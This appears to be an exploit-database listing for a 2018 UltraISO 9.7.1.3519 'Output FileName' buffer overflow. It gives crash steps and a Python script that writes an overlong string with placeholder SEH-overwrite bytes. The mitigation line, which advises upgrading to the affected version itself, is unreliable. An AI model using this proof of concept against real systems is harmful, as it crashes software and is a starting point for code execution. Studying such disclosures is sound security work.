header-logo
Suggest Exploit
vendor:
UltraISO
by:
Francisco Ramirez
7.8
CVSS
HIGH
Denial of Service (DoS) Local Buffer Overflow
119
CWE
Product Name: UltraISO
Affected Version From: 9.7.1.3519
Affected Version To: 9.7.1.3519
Patch Exists: YES
Related CWE: N/A
CPE: a:ezbsystems:ultraiso:9.7.1.3519
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro - 64 bit
2018

UltraISO 9.7.1.3519 – ‘Output FileName’ Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite

UltraISO 9.7.1.3519 is vulnerable to a denial of service attack when a maliciously crafted file is opened. An attacker can exploit this vulnerability by creating a specially crafted file and then convincing a user to open it. This will cause a denial of service condition.

Mitigation:

Upgrade to the latest version of UltraISO 9.7.1.3519 or later.
Source

Exploit-DB raw data:

# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
# Discovery by: Francisco Ramirez
# Discovery Date: 2018-12-14
# Vendor Homepage: https://www.ultraiso.com/
# Software Link : https://www.ultraiso.com/download.html
# Tested Version: 9.7.1.3519
# Tested on: Windows 10 Pro - 64 bit
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
 
# Steps to Produce the Crash: 
# 1.- Run python code : python UltraISO_9.7.1.3519.py
# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
# 3.- Open UltraISO_9.7.1.3519
# 4.- In the Window select 'Tools' > 'Make CD/DVD Image' 
# 5.- In the field  'Output FileName' remove the default path.
# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
# 7.- Click 'Make' and you will see a crash.
 
#!/usr/bin/env python
  
a_letters = "\x41" * 304
seRecord = "\x42" * 4
sehRecord = "\x43" * 4
buffer = a_letters + seRecord + sehRecord
f = open ("UltraISO_9.7.1.3519.txt", "w")
f.write(buffer)
f.close()